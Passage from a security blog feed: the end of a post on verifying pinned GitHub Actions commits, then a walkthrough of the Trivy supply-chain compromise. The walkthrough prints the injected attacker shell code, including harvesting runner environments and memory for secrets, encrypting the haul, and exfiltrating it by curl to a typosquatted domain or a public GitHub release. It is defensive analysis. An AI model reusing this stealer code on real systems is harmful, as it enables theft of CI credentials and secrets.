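    with urllib.request.urlopen(request, timeout=10) as response:
        return json.load(response)


def is_branch_head(repo, sha, fetch=get_json):
    """True when some branch in the repo currently has this commit as its HEAD."""
    return len(fetch(f"/repos/{repo}/commits/{sha}/branches-where-head")) != 0


def is_ancestor_of(repo, sha, branch, fetch=get_json):
    """True when the commit is reachable from the branch, per the compare endpoint."""
    result = fetch(f"/repos/{repo}/compare/{branch}...{sha}")
    # With the branch as base, "behind" or "identical" means the SHA adds nothing new.
    return result["status"] in ("behind", "identical")


def pin_is_trustworthy(repo, sha, branch="main", fetch=get_json):
    """Accept a pin only if it is a branch HEAD or sits in the branch history."""
    return is_branch_head(repo, sha, fetch) or is_ancestor_of(repo, sha, branch, fetch)
```

<p>Projects that cut releases from long-lived release branches would need to pass that branch name instead of <code class="language-plaintext highlighter-rouge">main</code>, otherwise legitimate pins will be rejected.</p>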

<p>Beyond that, the usual layers apply: require signed commits on workflow file changes, restrict allowed actions at the org level to an explicit allowlist, mirror the actions you depend on into your own org so fork reachability doesn’t apply, and verify build artifact provenance with <a href="https://docs.github.com/en/actions/security-for-github-actions/using-artifact-attestations/using-artifact-attestations-to-establish-provenance-for-builds">artifact attestations</a> rather than trusting whatever came out of CI.</p>

<p>The uncomfortable reality is that no single control would have stopped the Trivy attack. The commit came through a compromised maintainer account, so code review and branch protection were both present and both bypassed. The SHA pointed to a fork commit, so the pin itself was technically valid. GoReleaser validation was explicitly disabled, so the build system’s own integrity checks were stripped. Every control in the pipeline was individually subverted. The attack worked because nothing caught the chain.</p>

<h2 id="this-is-the-floor-not-the-ceiling">This Is the Floor, Not the Ceiling</h2>

<p>After the <code class="language-plaintext highlighter-rouge">tj-actions/changed-files</code> incident in early 2025, the security community converged on SHA pinning as <em>the</em> answer to GitHub Actions supply chain attacks. It was the right call, but it wasn’t the complete answer, and somewhere along the way the nuance got lost. “Pin your SHAs” turned into “pin your SHAs and you’re safe,” which is a very different statement.</p>

<p>Pin your SHAs. Then verify what they point to.</p>

<hr />

<p><em>This is a follow-up to my earlier post on the <a href="/2026/03/20/typosquatting-trivy">Trivy supply chain compromise</a>.</em></p>

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="security" /><category term="supply-chain" /><category term="github-actions" /><summary type="html"><![CDATA[A few days ago I wrote about how the Trivy ecosystem got turned into a credential stealer. One of my takeaways was “pin by SHA.” Every supply chain security guide says it, I’ve said it, every subreddit says it, and the GitHub Actions hardening docs say it.]]></summary></entry><entry><title type="html">How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer</title><link href="https://rosesecurity.cloud/2026/03/20/typosquatting-trivy.html" rel="alternate" type="text/html" title="How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer" /><published>2026-03-20T00:00:00+00:00</published><updated>2026-03-20T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/03/20/typosquatting-trivy</id><content type="html" xml:base="https://rosesecurity.cloud/2026/03/20/typosquatting-trivy.html"><![CDATA[<p>On March 19, 2026, someone (or some group) poisoned the Aqua Security Trivy ecosystem. A tool that thousands of organizations rely on to find vulnerabilities in their container images and configurations was quietly turned into a weapon that stole their secrets instead. I spent some time pulling apart the malicious code and cross-referencing findings from <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack">Wiz’s analysis</a>, and figured the walkthrough was worth sharing. Here’s how it happened (and how a majority of the tech industry ignored the compromise because it was a Friday).</p>

<h2 id="two-days-of-preparation">Two Days of Preparation</h2>

<p>The first sign of what was coming appeared on March 17, when someone registered the domain <code class="language-plaintext highlighter-rouge">aquasecurtiy.org</code> through Spaceship, Inc. It’s “securtiy” with the <code class="language-plaintext highlighter-rouge">i</code> and <code class="language-plaintext highlighter-rouge">t</code> swapped, not “security.” The <code class="language-plaintext highlighter-rouge">.org</code> TLD instead of <code class="language-plaintext highlighter-rouge">.com</code> added another layer of plausible misdirection.</p>

<p>Within fifty minutes of registration, the attacker had Let’s Encrypt certificates issued for <code class="language-plaintext highlighter-rouge">scan.aquasecurtiy.org</code>. The server behind it sat on AS48090, a small network called DMZHOST operated by a UK-registered company with a Gmail abuse contact and IP space flagged to Andorra. The kind of hosting provider that doesn’t ask too many questions about what you’re running.</p>

<p>Two days of infrastructure prep. Then the real work began.</p>

<h2 id="a-legitimate-version-silently-hijacked">A Legitimate Version, Silently Hijacked</h2>

<p><code class="language-plaintext highlighter-rouge">trivy-action</code> <code class="language-plaintext highlighter-rouge">0.34.2</code> was a real release. It shipped in late February with YAML trivyignore support and a Trivy version bump. Organizations adopted it through normal Renovate and Dependabot PRs weeks before anything went wrong.</p>

<p>According to <a href="https://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack">Wiz’s research</a>, the group behind this (calling themselves “TeamPCP”) had compromised the <code class="language-plaintext highlighter-rouge">aqua-bot</code> service account through residual access from an earlier incident in March 2026 that was never fully contained. With that access, they didn’t just tamper with one tag. They force-pushed 75 of 76 <code class="language-plaintext highlighter-rouge">trivy-action</code> tags and 7 <code class="language-plaintext highlighter-rouge">setup-trivy</code> tags to malicious commits. The <code class="language-plaintext highlighter-rouge">0.34.2</code> tag caused the most damage in the wild because so many organizations had already adopted it as a legitimate upgrade.</p>

<p>On March 19 around 17:43 UTC, the attacker moved the <code class="language-plaintext highlighter-rouge">0.34.2</code> tag. It had pointed to a clean commit; now it resolved to a different one (<code class="language-plaintext highlighter-rouge">ddb9da44</code>) that looked nearly identical to the original. Same author name, same timestamp, same commit message. The attacker had spoofed the commit metadata to impersonate known developers. <code class="language-plaintext highlighter-rouge">DmitriyLewen</code> is a legitimate Aqua Security engineer. <code class="language-plaintext highlighter-rouge">rauchg</code> is Guillermo Rauch, the CEO of Vercel, who has nothing to do with Aqua Security but whose name on a commit touching GitHub Actions plumbing wouldn’t raise an eyebrow. The only differences were the parent chain (it branched off <code class="language-plaintext highlighter-rouge">v0.35.0</code> instead of sitting on the main branch) and the contents of <code class="language-plaintext highlighter-rouge">entrypoint.sh</code>, which now had 105 lines of malicious code prepended to the legitimate Trivy logic.</p>

<p>This is the fundamental problem with Git tags: they’re just pointers. You can move them whenever you want, and anyone pulling that tag gets whatever it points to now, not what it pointed to yesterday. Every organization that had already pinned to <code class="language-plaintext highlighter-rouge">0.34.2</code> silently started pulling the attacker’s code with no change on their end.</p>
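<p>You can at least notice when a tag moves. The sketch below parses the output of <code class="language-plaintext highlighter-rouge">git ls-remote --tags</code> into a tag-to-SHA map and diffs two snapshots taken at different times. The function names are hypothetical, and how you store the earlier snapshot is up to you.</p>

```python
def parse_ls_remote(output):
    """Turn `git ls-remote --tags` output into a {tag: sha} mapping."""
    tags = {}
    for line in output.splitlines():
        sha, _, ref = line.partition("\t")
        if ref.startswith("refs/tags/"):
            # Annotated tags appear twice; the later "^{}" entry is the commit they wrap.
            tags[ref[len("refs/tags/"):].removesuffix("^{}")] = sha
    return tags


def moved_tags(previous, current):
    """Compare two {tag: sha} snapshots and report tags that now point elsewhere."""
    return {
        tag: (old_sha, current[tag])
        for tag, old_sha in previous.items()
        if tag in current and current[tag] != old_sha
    }
```

<p>Release tags are supposed to be write-once, so any entry in the result of <code class="language-plaintext highlighter-rouge">moved_tags()</code> deserves a closer look before the next workflow run picks it up.</p>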

<h2 id="walking-through-the-malicious-code">Walking Through the Malicious Code</h2>

<p>What makes this attack worth studying is how invisible it was to its victims. The 105 lines of malicious shell ran first, then handed off to the real Trivy scanner. Workflows completed successfully. Scans produced normal output. Nothing looked wrong unless you knew exactly where to look.</p>

<p>Here’s the actual injected code.</p>

<h3 id="phase-1-harvesting-runner-process-environments">Phase 1: Harvesting Runner Process Environments</h3>

<p>The first thing the payload does is find every GitHub Actions runner process on the box and read its environment variables straight out of <code class="language-plaintext highlighter-rouge">/proc</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">_COLLECT_PIDS</span><span class="o">=</span><span class="s2">"$$"</span>
<span class="k">for </span>_name <span class="k">in </span>Runner.Worker Runner.Listener runsvc run.sh<span class="p">;</span> <span class="k">do
  </span><span class="nv">_PIDS</span><span class="o">=</span><span class="si">$(</span>pgrep <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$_name</span><span class="s2">"</span> 2&gt;/dev/null <span class="o">||</span> <span class="nb">true</span><span class="si">)</span>
  <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$_PIDS</span><span class="s2">"</span> <span class="o">]</span> <span class="o">&amp;&amp;</span> <span class="nv">_COLLECT_PIDS</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_COLLECT_PIDS</span><span class="s2"> </span><span class="nv">$_PIDS</span><span class="s2">"</span>
<span class="k">done

</span><span class="nv">COLLECTED</span><span class="o">=</span><span class="s2">"/tmp/runner_collected_</span><span class="nv">$$</span><span class="s2">.txt"</span>
: <span class="o">&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>

<span class="k">for </span>_PID <span class="k">in</span> <span class="nv">$_COLLECT_PIDS</span><span class="p">;</span> <span class="k">do
  </span><span class="nv">_ENVIRON</span><span class="o">=</span><span class="s2">"/proc/</span><span class="k">${</span><span class="nv">_PID</span><span class="k">}</span><span class="s2">/environ"</span>
  <span class="o">[</span> <span class="nt">-r</span> <span class="s2">"</span><span class="nv">$_ENVIRON</span><span class="s2">"</span> <span class="o">]</span> <span class="o">||</span> <span class="k">continue
  while </span><span class="nv">IFS</span><span class="o">=</span> <span class="nb">read</span> <span class="nt">-r</span> line<span class="p">;</span> <span class="k">do
    </span><span class="nv">key</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">line</span><span class="p">%%=*</span><span class="k">}</span><span class="s2">"</span>
    <span class="nv">val</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">line</span><span class="p">#*=</span><span class="k">}</span><span class="s2">"</span>
    <span class="k">if </span><span class="nb">echo</span> <span class="s2">"</span><span class="nv">$key</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="nt">-qiE</span> <span class="s1">'(env|ssh)'</span><span class="p">;</span> <span class="k">then
      </span><span class="nb">printf</span> <span class="s1">'%s=%s\n'</span> <span class="s2">"</span><span class="nv">$key</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
      <span class="k">if</span> <span class="o">[</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">]</span> <span class="o">&amp;&amp;</span> <span class="o">[</span> <span class="o">!</span> <span class="nt">-S</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span><span class="nb">printf</span> <span class="s1">'\n[%s]\n'</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
        <span class="nb">cat</span> <span class="s2">"</span><span class="nv">$val</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
        <span class="nb">printf</span> <span class="s1">'\n'</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
      <span class="k">fi
    fi
  done</span> &lt; &lt;<span class="o">(</span><span class="nb">tr</span> <span class="s1">'\0'</span> <span class="s1">'\n'</span> &lt; <span class="s2">"</span><span class="nv">$_ENVIRON</span><span class="s2">"</span><span class="o">)</span>
<span class="k">done</span>
</code></pre></div></div>

<p>It uses <code class="language-plaintext highlighter-rouge">pgrep -f</code> to match four process names (<code class="language-plaintext highlighter-rouge">Runner.Worker</code>, <code class="language-plaintext highlighter-rouge">Runner.Listener</code>, <code class="language-plaintext highlighter-rouge">runsvc</code>, and <code class="language-plaintext highlighter-rouge">run.sh</code>) against full command lines, which covers every flavor of the GitHub Actions runner agent. For each process it finds, it reads <code class="language-plaintext highlighter-rouge">/proc/PID/environ</code>, which on Linux contains all of a process’s environment variables as null-delimited bytes. The <code class="language-plaintext highlighter-rouge">tr '\0' '\n'</code> converts those null bytes into newlines so the shell can iterate over them.</p>

<p>Then it gets clever. It doesn’t grab every variable. It keeps only keys that contain <code class="language-plaintext highlighter-rouge">env</code> or <code class="language-plaintext highlighter-rouge">ssh</code> (matched case-insensitively), which catches things like <code class="language-plaintext highlighter-rouge">SSH_PRIVATE_KEY</code>, <code class="language-plaintext highlighter-rouge">ENV_FILE</code>, or anything a developer might have named with those substrings. And here’s the part that shows someone thought about this: if the <em>value</em> of a matching variable is a path to a regular file on disk, the script reads that file’s contents too. So if you have <code class="language-plaintext highlighter-rouge">SSH_KEY_PATH=/home/runner/.ssh/id_ed25519</code>, it doesn’t just log the path. It cats the actual private key into the collection file.</p>
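<p>If you want to gauge how wide that net is, here’s a minimal Python sketch that applies the same key filter to an environment blob. The helper names (<code class="language-plaintext highlighter-rouge">parse_environ</code>, <code class="language-plaintext highlighter-rouge">exposed</code>) and the sample variables are mine, not the attacker’s, and it only inspects bytes you hand it rather than touching <code class="language-plaintext highlighter-rouge">/proc</code>:</p>

```python
import os
import re

# Same case-insensitive substring filter the payload applies to variable names.
KEY_FILTER = re.compile(r"(env|ssh)", re.IGNORECASE)


def parse_environ(raw: bytes) -> dict[str, str]:
    """Split a /proc/PID/environ style blob (NUL-delimited KEY=VALUE) into a dict."""
    pairs = {}
    for entry in raw.split(b"\0"):
        if b"=" not in entry:
            continue  # skips the empty trailing entry and malformed items
        key, _, value = entry.partition(b"=")
        pairs[key.decode(errors="replace")] = value.decode(errors="replace")
    return pairs


def exposed(env: dict[str, str]) -> dict[str, bool]:
    """Map each matching variable name to whether its value is a regular file."""
    return {
        key: os.path.isfile(value)
        for key, value in env.items()
        if KEY_FILTER.search(key)
    }


# Hypothetical sample blob, laid out the way the kernel exposes it.
sample = (
    b"SSH_KEY_PATH=/nonexistent/id_ed25519\0"
    b"HOME=/home/runner\0"
    b"RUNNER_ENVIRONMENT=github-hosted\0"
)
report = exposed(parse_environ(sample))
```

<p>Note that <code class="language-plaintext highlighter-rouge">RUNNER_ENVIRONMENT</code> matches too, because <code class="language-plaintext highlighter-rouge">env</code> is a substring of <code class="language-plaintext highlighter-rouge">ENVIRONMENT</code>. The filter is broader than it first looks.</p>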

<h3 id="phase-2-the-fork">Phase 2: The Fork</h3>

<p>After the environment harvest, the code branches based on where it’s running:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">uname</span><span class="si">)</span><span class="s2">"</span> <span class="o">==</span> <span class="s2">"Linux"</span> <span class="o">&amp;&amp;</span> <span class="s2">"</span><span class="nv">$RUNNER_ENVIRONMENT</span><span class="s2">"</span> <span class="o">==</span> <span class="s2">"github-hosted"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then
    </span><span class="nv">PYTHON_STR</span><span class="o">=</span><span class="s1">'aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJl...'</span>
    <span class="nv">MEMORY_SECRETS</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$PYTHON_STR</span><span class="s2">"</span> | <span class="nb">base64</span> <span class="nt">-d</span> | <span class="nb">sudo </span>python3 | <span class="se">\</span>
      <span class="nb">tr</span> <span class="nt">-d</span> <span class="s1">'\0'</span> | <span class="se">\</span>
      <span class="nb">grep</span> <span class="nt">-aoE</span> <span class="s1">'"[^"]+":\{"value":"[^"]*","isSecret":true\}'</span> | <span class="nb">sort</span> <span class="nt">-u</span><span class="si">)</span>
    <span class="nb">printf</span> <span class="s1">'%s=%s\n'</span> <span class="s2">"MEMORY_PARSE"</span> <span class="s2">"</span><span class="nv">$MEMORY_SECRETS</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
<span class="k">else
    </span><span class="nv">PYTHON_STR</span><span class="o">=</span><span class="s1">'aW1wb3J0IG9zLHN5cyxzdGF0LHN1YnByb2Nlc3Ms...'</span>
    <span class="nv">SHELL_RUNNER_GOODIES</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$PYTHON_STR</span><span class="s2">"</span> | <span class="nb">base64</span> <span class="nt">-d</span> | python3<span class="si">)</span>
    <span class="nb">printf</span> <span class="s1">'%s=%s\n'</span> <span class="s2">"SHELL_GOODIES"</span> <span class="s2">"</span><span class="nv">$SHELL_RUNNER_GOODIES</span><span class="s2">"</span> <span class="o">&gt;&gt;</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span>
<span class="k">fi</span>
</code></pre></div></div>

<p>Both paths hide their real logic inside base64-encoded Python payloads, a straightforward way to evade static detection by anyone grepping the action source for suspicious keywords.</p>

<p><strong>On GitHub-hosted runners</strong>, the decoded Python does something audacious. It walks <code class="language-plaintext highlighter-rouge">/proc</code> looking for the <code class="language-plaintext highlighter-rouge">Runner.Worker</code> process, then reads its memory map from <code class="language-plaintext highlighter-rouge">/proc/PID/maps</code> to find all readable memory regions, and reads the raw bytes out of <code class="language-plaintext highlighter-rouge">/proc/PID/mem</code>. It runs under <code class="language-plaintext highlighter-rouge">sudo</code> because accessing another process’s memory requires elevated privileges. The output gets piped through a regex that matches GitHub Actions’ internal secret storage format: <code class="language-plaintext highlighter-rouge">"SECRET_NAME":{"value":"the_actual_secret","isSecret":true}</code>. That’s how the runner keeps track of masked secrets in memory. Those <code class="language-plaintext highlighter-rouge">***</code> masks in your logs? The actual values are right there in the runner process’s heap, and this script knows exactly what pattern to look for.</p>
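<p>To make that pattern concrete, here’s a small Python sketch that runs an equivalent regex over a byte buffer. The function name and the sample secret are made up for illustration. The NUL-stripping step mirrors the payload’s <code class="language-plaintext highlighter-rouge">tr -d '\0'</code>; my assumption is that it exists because the .NET-based runner holds strings as UTF-16, which interleaves NUL bytes with ASCII text:</p>

```python
import re

# Python equivalent of the payload's grep pattern, with capture groups added.
SECRET_RE = re.compile(rb'"([^"]+)":\{"value":"([^"]*)","isSecret":true\}')


def find_masked_secrets(blob: bytes) -> dict[str, str]:
    """Return {name: value} for every isSecret entry found in blob."""
    cleaned = blob.replace(b"\0", b"")  # same effect as the payload's tr -d step
    return {
        name.decode(errors="replace"): value.decode(errors="replace")
        for name, value in SECRET_RE.findall(cleaned)
    }


# Hypothetical buffer: one masked secret and one ordinary variable, as UTF-16.
sample = (
    '"NPM_TOKEN":{"value":"abc123","isSecret":true},'
    '"CI":{"value":"true","isSecret":false}'
).encode("utf-16-le")
found = find_masked_secrets(sample)
```

<p>Only the entry flagged <code class="language-plaintext highlighter-rouge">"isSecret":true</code> comes back, which is exactly the set of values the log masking was supposed to protect.</p>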

<p><strong>On self-hosted runners</strong>, the decoded Python is a comprehensive filesystem stealer. It’s long (really long) because it has hardcoded paths for basically every credential file that might exist on a Linux machine. When decoded from base64, it defines helper functions for reading files (<code class="language-plaintext highlighter-rouge">emit</code>), running commands (<code class="language-plaintext highlighter-rouge">run</code>), and walking directory trees (<code class="language-plaintext highlighter-rouge">walk</code>), then systematically works through SSH keys and configs from every home directory and <code class="language-plaintext highlighter-rouge">/etc/ssh</code>, git credentials, AWS/GCP/Azure credentials, every flavor of <code class="language-plaintext highlighter-rouge">.env</code> file walking up to 6 directories deep, cloud IMDS endpoints for both ECS and EC2, Kubernetes configs and service account tokens, Docker configs (including the Kaniko-specific path at <code class="language-plaintext highlighter-rouge">/kaniko/.docker/config.json</code>), NPM tokens, Vault tokens, database credentials for MySQL/PostgreSQL/MongoDB/Redis, WireGuard configs, Terraform <code class="language-plaintext highlighter-rouge">.tfvars</code> and <code class="language-plaintext highlighter-rouge">.tfstate</code> files, TLS private keys, Slack and Discord webhook URLs, and cryptocurrency wallets for Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero, Ethereum, Cardano, and Solana. It also grabs <code class="language-plaintext highlighter-rouge">/etc/passwd</code>, <code class="language-plaintext highlighter-rouge">/etc/shadow</code>, and auth logs for good measure.</p>

<p>The script ends with the comment <code class="language-plaintext highlighter-rouge">## TeamPCP Cloud stealer</code>.</p>

<h3 id="phase-3-encrypt-and-exfiltrate">Phase 3: Encrypt and Exfiltrate</h3>

<p>Once the collection phase finishes, the payload only continues if it actually found something (<code class="language-plaintext highlighter-rouge">-s "$COLLECTED"</code> checks the file isn’t empty). Then it sets up a hybrid encryption scheme:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="o">[</span> <span class="nt">-s</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
  </span><span class="nv">_PUB_KEY_PEM</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="nb">mktemp</span><span class="si">)</span><span class="s2">"</span>
  <span class="nb">cat</span> <span class="o">&gt;</span> <span class="s2">"</span><span class="nv">$_PUB_KEY_PEM</span><span class="s2">"</span> <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">PUBKEY</span><span class="sh">'
-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+
...
-----END PUBLIC KEY-----
</span><span class="no">PUBKEY

</span>  <span class="nv">_WORKDIR</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span><span class="nb">mktemp</span> <span class="nt">-d</span><span class="si">)</span><span class="s2">"</span>
  <span class="nv">_SESSION_KEY</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/session.key"</span>
  <span class="nv">_ENC_FILE</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/payload.enc"</span>
  <span class="nv">_ENC_KEY</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/session.key.enc"</span>
  <span class="nv">_BUNDLE</span><span class="o">=</span><span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">/tpcp.tar.gz"</span>

  openssl rand 32 <span class="o">&gt;</span> <span class="s2">"</span><span class="nv">$_SESSION_KEY</span><span class="s2">"</span> 2&gt;/dev/null
  openssl enc <span class="nt">-aes-256-cbc</span> <span class="nt">-in</span> <span class="s2">"</span><span class="nv">$COLLECTED</span><span class="s2">"</span> <span class="nt">-out</span> <span class="s2">"</span><span class="nv">$_ENC_FILE</span><span class="s2">"</span> <span class="se">\</span>
    <span class="nt">-pass</span> <span class="s2">"file:</span><span class="nv">$_SESSION_KEY</span><span class="s2">"</span> <span class="nt">-pbkdf2</span> 2&gt;/dev/null
  openssl pkeyutl <span class="nt">-encrypt</span> <span class="nt">-pubin</span> <span class="nt">-inkey</span> <span class="s2">"</span><span class="nv">$_PUB_KEY_PEM</span><span class="s2">"</span> <span class="se">\</span>
    <span class="nt">-in</span> <span class="s2">"</span><span class="nv">$_SESSION_KEY</span><span class="s2">"</span> <span class="nt">-out</span> <span class="s2">"</span><span class="nv">$_ENC_KEY</span><span class="s2">"</span> <span class="se">\</span>
    <span class="nt">-pkeyopt</span> rsa_padding_mode:oaep 2&gt;/dev/null
  <span class="nb">tar</span> <span class="nt">-czf</span> <span class="s2">"</span><span class="nv">$_BUNDLE</span><span class="s2">"</span> <span class="nt">-C</span> <span class="s2">"</span><span class="nv">$_WORKDIR</span><span class="s2">"</span> payload.enc session.key.enc 2&gt;/dev/null
</code></pre></div></div>

<p>Textbook hybrid encryption: a random 32-byte session key, stretched through PBKDF2, drives AES-256-CBC over the collected data. Then the session key itself gets encrypted with the attacker’s embedded RSA-4096 public key using OAEP padding. Both ciphertext files get tarred into <code class="language-plaintext highlighter-rouge">tpcp.tar.gz</code>. Only someone holding the corresponding RSA private key can reverse this. Even if you intercept the bundle on the wire, the contents are opaque.</p>

<h3 id="phase-4-phone-home-with-a-backup-plan">Phase 4: Phone Home (with a Backup Plan)</h3>

<p>The exfiltration has a primary and fallback channel:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="nv">_HTTP</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-o</span> /dev/null <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="nt">-X</span> POST <span class="se">\</span>
    https://scan.aquasecurtiy.org <span class="se">\</span>
    <span class="nt">-H</span> <span class="s2">"Content-Type: application/octet-stream"</span> <span class="se">\</span>
    <span class="nt">-H</span> <span class="s2">"X-Filename: tpcp.tar.gz"</span> <span class="se">\</span>
    <span class="nt">--data-binary</span> <span class="s2">"@</span><span class="k">${</span><span class="nv">_BUNDLE</span><span class="k">}</span><span class="s2">"</span> 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo</span> <span class="s2">"000"</span><span class="si">)</span>

  <span class="k">if</span> <span class="o">[[</span> <span class="o">!</span> <span class="s2">"</span><span class="nv">$_HTTP</span><span class="s2">"</span> <span class="o">=</span>~ ^2 <span class="o">]]</span> <span class="o">&amp;&amp;</span> <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="k">${</span><span class="nv">INPUT_GITHUB_PAT</span><span class="k">:-}</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
    </span><span class="nv">_REPO</span><span class="o">=</span><span class="s2">"tpcp-docs"</span>
    <span class="nv">_GH_AUTH</span><span class="o">=</span><span class="s2">"Authorization: token </span><span class="k">${</span><span class="nv">INPUT_GITHUB_PAT</span><span class="k">}</span><span class="s2">"</span>
    <span class="nv">_GH_API</span><span class="o">=</span><span class="s2">"https://api.github.com"</span>

    curl <span class="nt">-s</span> <span class="nt">-X</span> POST <span class="s2">"</span><span class="k">${</span><span class="nv">_GH_API</span><span class="k">}</span><span class="s2">/user/repos"</span> <span class="se">\</span>
      <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="se">\</span>
      <span class="nt">-d</span> <span class="s1">'{"name":"'</span><span class="s2">"</span><span class="k">${</span><span class="nv">_REPO</span><span class="k">}</span><span class="s2">"</span><span class="s1">'","private":false,"auto_init":true}'</span> <span class="se">\</span>
      <span class="o">&gt;</span>/dev/null 2&gt;&amp;1 <span class="o">||</span> <span class="nb">true

    </span><span class="nv">_GH_USER</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="s2">"</span><span class="k">${</span><span class="nv">_GH_API</span><span class="k">}</span><span class="s2">/user"</span> 2&gt;/dev/null <span class="se">\</span>
      | <span class="nb">grep</span> <span class="nt">-oE</span> <span class="s1">'"login"\s*:\s*"[^"]+"'</span> | <span class="nb">head</span> <span class="nt">-1</span> | <span class="nb">sed</span> <span class="s1">'s/.*"\([^"]*\)"$/\1/'</span><span class="si">)</span>

    <span class="nv">_TAG</span><span class="o">=</span><span class="s2">"data-</span><span class="si">$(</span><span class="nb">date</span> +%Y%m%d%H%M%S<span class="si">)</span><span class="s2">"</span>
    <span class="nv">_RELEASE_ID</span><span class="o">=</span><span class="si">$(</span>curl <span class="nt">-s</span> <span class="nt">-X</span> POST <span class="se">\</span>
      <span class="s2">"</span><span class="k">${</span><span class="nv">_GH_API</span><span class="k">}</span><span class="s2">/repos/</span><span class="k">${</span><span class="nv">_GH_USER</span><span class="k">}</span><span class="s2">/</span><span class="k">${</span><span class="nv">_REPO</span><span class="k">}</span><span class="s2">/releases"</span> <span class="se">\</span>
      <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="se">\</span>
      <span class="nt">-d</span> <span class="s1">'{"tag_name":"'</span><span class="s2">"</span><span class="k">${</span><span class="nv">_TAG</span><span class="k">}</span><span class="s2">"</span><span class="s1">'","name":"'</span><span class="s2">"</span><span class="k">${</span><span class="nv">_TAG</span><span class="k">}</span><span class="s2">"</span><span class="s1">'"}'</span> <span class="se">\</span>
      2&gt;/dev/null | <span class="nb">grep</span> <span class="nt">-oE</span> <span class="s1">'"id"\s*:\s*[0-9]+'</span> | <span class="nb">head</span> <span class="nt">-1</span> | <span class="nb">grep</span> <span class="nt">-oE</span> <span class="s1">'[0-9]+'</span><span class="si">)</span>

    <span class="k">if</span> <span class="o">[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$_RELEASE_ID</span><span class="s2">"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
      </span>curl <span class="nt">-s</span> <span class="nt">-X</span> POST <span class="se">\</span>
        <span class="s2">"https://uploads.github.com/repos/</span><span class="k">${</span><span class="nv">_GH_USER</span><span class="k">}</span><span class="s2">/</span><span class="k">${</span><span class="nv">_REPO</span><span class="k">}</span><span class="s2">/releases/</span><span class="k">${</span><span class="nv">_RELEASE_ID</span><span class="k">}</span><span class="s2">/assets?name=tpcp.tar.gz"</span> <span class="se">\</span>
        <span class="nt">-H</span> <span class="s2">"</span><span class="nv">$_GH_AUTH</span><span class="s2">"</span> <span class="se">\</span>
        <span class="nt">-H</span> <span class="s2">"Content-Type: application/octet-stream"</span> <span class="se">\</span>
